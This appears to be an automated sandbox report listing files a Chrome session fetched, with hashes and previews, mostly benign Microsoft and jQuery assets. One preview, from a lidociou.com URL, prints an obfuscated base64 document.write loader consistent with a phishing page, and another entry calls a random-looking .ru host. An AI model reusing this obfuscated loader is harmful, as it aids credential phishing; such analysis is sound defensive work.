                                                                              Preview:..<!DOCTYPE html><html xmlns:mscom="http://schemas.microsoft.com/CMSvNext".. xmlns:md="http://schemas.microsoft.com/mscom-data" lang="en-us".. xmlns="http://www.w3.org/1999/xhtml"><head><link rel="shortcut icon".. href="//www.microsoft.com/favicon.ico?v2" /><link.. type="text/css" rel="stylesheet".. href="https://assets.onestore.ms/cdnfiles/external/mwf/long/v1/v1.25.0/css/mwf-west-european-default.min.css".. /><title>Your request has been blocked. This could be.. due to several reasons.</title><meta name="Title".. content="We are sorry, the page you requested cannot be.. found" /><meta name="CorrelationVector".. content="VbLZYbRlhU2hyedN.1" /><meta name="Description".. content="" /><meta name="MscomContentLocale".. content="en-us" /><meta name="
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with very long lines (47691)
                                                                              Category:dropped
                                                                              Size (bytes):47692
                                                                              Entropy (8bit):5.401573598696506
                                                                              Encrypted:false
                                                                              SSDEEP:768:IXCtQmIutwVHBzZBF6gmXLSOzQDjdadOQbk6sgEvxm7b39tobLKZUvnw81KZLGcD:IGJWHBzZBF6xbGeLsVvQ33FUvDW
                                                                              MD5:B0B3774E70E752266B4CF190E6D95053
                                                                              SHA1:03823D33D8C374DD69B66F1D75A5FC93D29967E1
                                                                              SHA-256:A9F0787E39291D7BCB873D0D514F1D2C8DB0256FD741C2ABC4D46A809254E141
                                                                              SHA-512:8060AA547C3F32930EC2A3786A6BB15054F396D8EAB238EA34E881C2EEAE0D013AF246FDDE85DA8A5BFC2690B1EB26E5138B45BAA28479264DB3BA458D4055A8
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:HTML document, ASCII text, with very long lines (7465), with CRLF line terminators
                                                                              Category:downloaded
                                                                              Size (bytes):19706
                                                                              Entropy (8bit):5.869242462135855
                                                                              Encrypted:false
                                                                              SSDEEP:384:QnuDWAlmwtDVvcciwdnuDWAlmwtDVvcciwllrxlrV:e2mq0cD2mq0cFlrxlrV
                                                                              MD5:0985ACF739CDFC026507E71F040288A1
                                                                              SHA1:0AB710BBA8D79EAE8AB0D844EBC7BB99FD6AA034
                                                                              SHA-256:83D98B71C0BE6DCAF93272DDACA527BA99D2004A85D5977270E0EDB20FF99546
                                                                              SHA-512:DBF6209C694153E3D590BA02FB764798099317D546E895D6375CFE7DC73AF1B9A9BC5C5BA8FA42749442254F034577A1696583C4FE62A7A8D05E97B7439B0464
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://fht.lidociou.com/lrjqM/
                                                                              Preview: The biggest risk is not taking any risk. -->....<script>....if(atob("aHR0cHM6Ly9maFQubGlkb2Npb3UuY29tL2xyanFNLw==") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0eWxlPg0KYm9keSB7DQogIGJhY2tncm91bmQtY29sb3I6ICNmZmY7DQogIGhlaWdodDogMTAwJTsNCiAgb3Zl
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                              Category:downloaded
                                                                              Size (bytes):17174
                                                                              Entropy (8bit):2.9129715116732746
                                                                              Encrypted:false
                                                                              SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                              MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                              SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                              SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                              SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://www.microsoft.com/favicon.ico?v2
                                                                              Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with very long lines (65447)
                                                                              Category:downloaded
                                                                              Size (bytes):89501
                                                                              Entropy (8bit):5.289893677458563
                                                                              Encrypted:false
                                                                              SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                              MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                              SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                              SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                              SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                              Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:downloaded
                                                                              Size (bytes):15
                                                                              Entropy (8bit):3.189898095464287
                                                                              Encrypted:false
                                                                              SSDEEP:3:Uh1Kn:UDKn
                                                                              MD5:39A19D0882684989864FA50BCED6A2D1
                                                                              SHA1:5CED55DAC2E0427E9DC605CEC1FEDAB0949EB15E
                                                                              SHA-256:8FBEDED073249C3611742297EE96A976A95EE113F33B9A422A5D3A7A2DEB63E5
                                                                              SHA-512:E795CB7DE27B42948B7DDFF19F3B401A8F95753AC7D37D9B5F52D8DACD2AA43A2AD9EACEC29F77D28080E20C21C48B9FA88A733FAC108939FB2F0EB036C7AEEE
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://statics-marketingsites-wcus-ms-com.akamaized.net/statics/override.css?c=7
                                                                              Preview:/* empty css */
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with very long lines (32089)
                                                                              Category:dropped
                                                                              Size (bytes):92629
                                                                              Entropy (8bit):5.303443527492463
                                                                              Encrypted:false
                                                                              SSDEEP:1536:dnu00HWWaRxkqJg09pYxoxDKMXJrg8hXXO4dK3kyfiLJBhdSZE+I+Qg7rbaN1RUx:ddkWgoBhcZRQgmW42qe
                                                                              MD5:397754BA49E9E0CF4E7C190DA78DDA05
                                                                              SHA1:AE49E56999D82802727455F0BA83B63ACD90A22B
                                                                              SHA-256:C12F6098E641AACA96C60215800F18F5671039AECF812217FAB3C0D152F6ADB4
                                                                              SHA-512:8C64754F77507AB2C24A6FC818419B9DD3F0CECCC9065290E41AFDBEE0743F0DA2CB13B2FBB00AFA525C082F1E697CB3FFD76EF9B902CB81D7C41CA1C641DFFB
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:/*! jQuery v1.9.1 | (c) 2005, 2012 jQuery Foundation, Inc. | jquery.org/license.//@ sourceMappingURL=jquery.min.map.*/(function(e,t){var n,r,i=typeof t,o=e.document,a=e.location,s=e.jQuery,u=e.$,l={},c=[],p="1.9.1",f=c.concat,d=c.push,h=c.slice,g=c.indexOf,m=l.toString,y=l.hasOwnProperty,v=p.trim,b=function(e,t){return new b.fn.init(e,t,r)},x=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,w=/\S+/g,T=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,N=/^(?:(<[\w\W]+>)[^>]*|#([\w-]*))$/,C=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,k=/^[\],:{}\s]*$/,E=/(?:^|:|,)(?:\s*\[)+/g,S=/\\(?:["\\\/bfnrt]|u[\da-fA-F]{4})/g,A=/"[^"\\\r\n]*"|true|false|null|-?(?:\d+\.|)\d+(?:[eE][+-]?\d+|)/g,j=/^-ms-/,D=/-([\da-z])/gi,L=function(e,t){return t.toUpperCase()},H=function(e){(o.addEventListener||"load"===e.type||"complete"===o.readyState)&&(q(),b.ready())},q=function(){o.addEventListener?(o.removeEventListener("DOMContentLoaded",H,!1),e.removeEventListener("load",H,!1)):(o.detachEvent("onreadystatechange",H),e.detachEvent("onload",H)
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:very short file (no magic)
                                                                              Category:downloaded
                                                                              Size (bytes):1
                                                                              Entropy (8bit):0.0
                                                                              Encrypted:false
                                                                              SSDEEP:3:U:U
                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://ic3tm8fvmojrxm3ckq3pnid4ifsnn1sfw7p2umpbo0wkfxthgllk7e.ezmbsgzm.ru/GYBrLQVgjFNpAAeCNlxgZEUdgeRBHHRSZOUCERPJKVKBUNXOZCFFBQYMJKGSEABHAPBEGCPEJQHOWXNRI
                                                                              Preview:1
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:PNG image data, 216 x 46, 8-bit/color RGBA, non-interlaced
                                                                              Category:downloaded
                                                                              Size (bytes):4054
                                                                              Entropy (8bit):7.797012573497454
                                                                              Encrypted:false
                                                                              SSDEEP:48:zICvnyRHJ3BRZPcSPQ72N2xoiR4fTJX/rj4sFNMkk5/p1k2lPUmbm39o4aL7V9XH:10nvE724xoiRQJPrjpLKSFl9oX31Z1d
                                                                              MD5:9F14C20150A003D7CE4DE57C298F0FBA
                                                                              SHA1:DAA53CF17CC45878A1B153F3C3BF47DC9669D78F
                                                                              SHA-256:112FEC798B78AA02E102A724B5CB1990C0F909BC1D8B7B1FA256EAB41BBC0960
                                                                              SHA-512:D4F6E49C854E15FE48D6A1F1A03FDA93218AB8FCDB2C443668E7DF478830831ACC2B41DAEFC25ED38FCC8D96C4401377374FED35C36A5017A11E63C8DAE5C487
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
                                                                              Preview:.PNG........IHDR.............J.......tEXtSoftware.Adobe ImageReadyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c132 79.159284, 2016/04/19-13:13:40 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:A00BC639840A11E68CBEB97C2156C7FD" xmpMM:InstanceID="xmp.iid:A00BC638840A11E68CBEB97C2156C7FD" xmp:CreatorTool="Adobe Photoshop CC 2015.5 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A2C931A470A111E6AEDFA14578553B7B" stRef:documentID="xmp.did:A2C931A570A111E6AEDFA14578553B7B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......DIDATx..\..UU.>.7..3....h.L..& j2...h.@..".........`U.......R"..Dq.&.BJR 1.4`$.200...l........wg.y.[k/
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                              Category:dropped
                                                                              Size (bytes):17174
                                                                              Entropy (8bit):2.9129715116732746
                                                                              Encrypted:false
                                                                              SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                              MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                              SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                              SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                              SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with very long lines (41651)
                                                                              Category:downloaded
                                                                              Size (bytes):131537
                                                                              Entropy (8bit):5.2237799798561975
                                                                              Encrypted:false
                                                                              SSDEEP:3072:1f/HuF3CpxEIqQ0/9d1EwgXAnKxnKKviV:1f/HuZ1ILGV
                                                                              MD5:30B7C335C62E5269E2D35B8E8B9F44B4
                                                                              SHA1:C6D92B1516EB8F6D44AAF171FB24A1B2AADD0C4C
                                                                              SHA-256:10733A5D876108F81C5F78EEE5C9760A739D89C52FA6180C4290B7F909F24346
                                                                              SHA-512:5BCE247C84C88F993A857CE2F1E8540C648672DEB6D92A55BC808C33394B784C52866D635BEC8B7CD5E62A7EA4109569AC8BCD1381571B84592ACD6C5901D7A8
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://www.microsoft.com/onerfstatics/marketingsites-wcus-prod/shell/_scrf/js/themes=default/54-af9f9f/c0-247156/de-099401/e1-a50eee/e7-954872/d8-97d509/f0-251fe2/46-be1318/77-04a268/11-240c7b/63-077520/a4-34de62/1b-c96630/db-bc0148/dc-7e9864/78-4c7d22/e1-c35781/40-7b7803/cd-23d3b0/6d-1e7ed0/b7-cadaa7/ca-40b7b0/4e-ee3a55/3e-f5c39b/c3-6454d7/f9-7592d3/92-10345d/79-499886/7e-cda2d3/db-f3b1fd/93-283c2d/e0-3c9860/91-97a04f/1f-100dea/33-abe4df/19-c0fae7?ver=2.0&iife=1
                                                                              Preview:(function(){/**. * @license almond 0.3.3 Copyright jQuery Foundation and other contributors.. * Released under MIT license, http://github.com/requirejs/almond/LICENSE. */.var requirejs,require,define,__extends;(function(n){function r(n,t){return w.call(n,t)}function s(n,t){var o,s,f,e,h,p,c,b,r,l,w,k,u=t&&t.split("/"),a=i.map,y=a&&a["*"]||{};if(n){for(n=n.split("/"),h=n.length-1,i.nodeIdCompat&&v.test(n[h])&&(n[h]=n[h].replace(v,"")),n[0].charAt(0)==="."&&u&&(k=u.slice(0,u.length-1),n=k.concat(n)),r=0;r<n.length;r++)if(w=n[r],w===".")n.splice(r,1),r-=1;else if(w==="..")if(r===0||r===1&&n[2]===".."||n[r-1]==="..")continue;else r>0&&(n.splice(r-1,2),r-=2);n=n.join("/")}if((u||y)&&a){for(o=n.split("/"),r=o.length;r>0;r-=1){if(s=o.slice(0,r).join("/"),u)for(l=u.length;l>0;l-=1)if(f=a[u.slice(0,l).join("/")],f&&(f=f[s],f)){e=f;p=r;break}if(e)break;!c&&y&&y[s]&&(c=y[s],b=r)}!e&&c&&(e=c,p=b);e&&(o.splice(0,p,e),n=o.join("/"))}return n}function y(t,i){return function(){var r=b.call(arguments,0
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:very short file (no magic)
                                                                              Category:dropped
                                                                              Size (bytes):1
                                                                              Entropy (8bit):0.0
                                                                              Encrypted:false
                                                                              SSDEEP:3:U:U
                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:1
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with very long lines (32089)
                                                                              Category:downloaded
                                                                              Size (bytes):92629
                                                                              Entropy (8bit):5.303443527492463
                                                                              Encrypted:false
                                                                              SSDEEP:1536:dnu00HWWaRxkqJg09pYxoxDKMXJrg8hXXO4dK3kyfiLJBhdSZE+I+Qg7rbaN1RUx:ddkWgoBhcZRQgmW42qe
                                                                              MD5:397754BA49E9E0CF4E7C190DA78DDA05
                                                                              SHA1:AE49E56999D82802727455F0BA83B63ACD90A22B
                                                                              SHA-256:C12F6098E641AACA96C60215800F18F5671039AECF812217FAB3C0D152F6ADB4
                                                                              SHA-512:8C64754F77507AB2C24A6FC818419B9DD3F0CECCC9065290E41AFDBEE0743F0DA2CB13B2FBB00AFA525C082F1E697CB3FFD76EF9B902CB81D7C41CA1C641DFFB
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
                                                                              Preview:/*! jQuery v1.9.1 | (c) 2005, 2012 jQuery Foundation, Inc. | jquery.org/license.//@ sourceMappingURL=jquery.min.map.*/(function(e,t){var n,r,i=typeof t,o=e.document,a=e.location,s=e.jQuery,u=e.$,l={},c=[],p="1.9.1",f=c.concat,d=c.push,h=c.slice,g=c.indexOf,m=l.toString,y=l.hasOwnProperty,v=p.trim,b=function(e,t){return new b.fn.init(e,t,r)},x=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,w=/\S+/g,T=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,N=/^(?:(<[\w\W]+>)[^>]*|#([\w-]*))$/,C=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,k=/^[\],:{}\s]*$/,E=/(?:^|:|,)(?:\s*\[)+/g,S=/\\(?:["\\\/bfnrt]|u[\da-fA-F]{4})/g,A=/"[^"\\\r\n]*"|true|false|null|-?(?:\d+\.|)\d+(?:[eE][+-]?\d+|)/g,j=/^-ms-/,D=/-([\da-z])/gi,L=function(e,t){return t.toUpperCase()},H=function(e){(o.addEventListener||"load"===e.type||"complete"===o.readyState)&&(q(),b.ready())},q=function(){o.addEventListener?(o.removeEventListener("DOMContentLoaded",H,!1),e.removeEventListener("load",H,!1)):(o.detachEvent("onreadystatechange",H),e.detachEvent("onload",H)
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65532), with no line terminators
                                                                              Category:downloaded
                                                                              Size (bytes):563851
                                                                              Entropy (8bit):5.221453271093944
                                                                              Encrypted:false
                                                                              SSDEEP:6144:2VR57iqbPXlB5UR5vWenR5xWeMFdBjL+ks0EcU0MWEsuWe5fXbHfxlN/FNCn/Lpl:tTP0BKYtf
                                                                              MD5:12DD1E4D0485A80184B36D158018DE81
                                                                              SHA1:EB2594062E90E3DCD5127679F9C369D3BF39D61C
                                                                              SHA-256:A04B5B8B345E79987621008E6CC9BEF2B684663F9A820A0C7460E727A2A4DDC3
                                                                              SHA-512:F3A92BF0C681E6D2198970F43B966ABDF8CCBFF3F9BD5136A1CA911747369C49F8C36C69A7E98E0F2AED3163D9D1C5D44EFCE67A178DE479196845721219E12C
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://assets.onestore.ms/cdnfiles/external/mwf/long/v1/v1.25.0/css/mwf-west-european-default.min.css
                                                                              Preview:@charset "UTF-8";/*! @ms-mwf/mwf - v1.25.0+6321934 | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.*//*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css *
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:Web Open Font Format, TrueType, length 26288, version 0.0
                                                                              Category:downloaded
                                                                              Size (bytes):26288
                                                                              Entropy (8bit):7.984195877171481
                                                                              Encrypted:false
                                                                              SSDEEP:768:56JqQaQphRbTHiKNF5z/02h5KpJW3pPOA8Y9g/:gdTTH5XKpJWdH1W/
                                                                              MD5:D0263DC03BE4C393A90BDA733C57D6DB
                                                                              SHA1:8A032B6DEAB53A33234C735133B48518F8643B92
                                                                              SHA-256:22B4DF5C33045B645CAFA45B04685F4752E471A2E933BFF5BF14324D87DEEE12
                                                                              SHA-512:9511BEF269AE0797ADDF4CD6F2FEC4AD0C4A4E06B3E5BF6138C7678A203022AC4818C7D446D154594504C947DA3061030E82472D2708149C0709B1A070FDD0E3
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://www.microsoft.com/mwf/_h/v3.54/mwf.app/fonts/mwfmdl2-v3.54.woff
                                                                              Preview:wOFF......f........D........................OS/2...X...H...`JM.FVDMX.............^.qcmap.............*.9cvt ...4... ...*....fpgm...T.......Y...gasp...D............glyf...P..U5.......head..]....2...6...Chhea..]........$$...hmtx..]..........ye'loca..^............Gmaxp..`.... ... ./..name..`....8....]..Rpost..f........ .Q.wprep..f$........x...x.c`.Pf......:....Q.B3_dHc..`e.bdb... .`@..`......./9.|...V...)00...-.Wx...S......._..m.m.m.m.m;e..y.~.......<p..a.0t.&...a.pa.0B.1..F...Q.ha.0F.3.....q.xa.0A.0L.&...I.da.0E.2L....i.ta.0C.1..f...Y.la.0G.3.....y.|a..@X0,.....E.ba.DX2,....e.ra..BX1..V...U.ja..FX3.....u.za..A.0l.6...M.fa.E.2l....m.va..C.1..v...].na..G.3......}.~a.p@80......C.a..pD82.....c.q..pB81..N...S.i..pF83.....s.y..pA.0\.....K.e..pE.2\....k.u..pC.1..n...[.m..pG.3......{.}...@x0<.....G.c...Dx2<....g.s...Bx1..^...W.k...Fx3.....w.{...A.0|.>...O.g...E.2|....o.w...C.1..~..._.o..08........?..0$........x...mL.U.............9.x.`[...&BF@X...V.h.Z..h......`n....[..U
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:Unicode text, UTF-8 text, with very long lines (64241)
                                                                              Category:downloaded
                                                                              Size (bytes):167730
                                                                              Entropy (8bit):5.045981547409661
                                                                              Encrypted:false
                                                                              SSDEEP:3072:OzCPZkTP3bDLH0tfRqQ0xtLfj4ZDSIpTt813viY8R1j35Ap7LQZLPPJH7PAbOCxW:clZAP+keedJ
                                                                              MD5:AFB5C64B13342F6E568093548D0A2A9F
                                                                              SHA1:95FC121CCCFDBA12443CF87A9C823486065A14AB
                                                                              SHA-256:238DB52476BF8107E2E851CD3299B071ED5944B570C1603A1EA758A4FADF5F29
                                                                              SHA-512:6FE8BADD1B94E81464C0808383A4CC77F779BF226A3C13B58B2BCB36332995EFBC7711373EE8AB2A8BC52675884F9885D168CB2DE9535E39E71B0B72940691E1
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://www.microsoft.com/onerfstatics/marketingsites-wcus-prod/west-european/shell/_scrf/css/themes=default.device=uplevel_web_pc/2b-7ae144/7e-3283eb/69-8122fc/86-016699/72-2b1d8c/80-6461e7/2a-d9be59/51-40faf7?ver=2.0
                                                                              Preview:@charset "UTF-8";./*! | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.*/./*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */.body{margin:0}.context-uh
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                              Category:dropped
                                                                              Size (bytes):61
                                                                              Entropy (8bit):3.990210155325004
                                                                              Encrypted:false
                                                                              SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
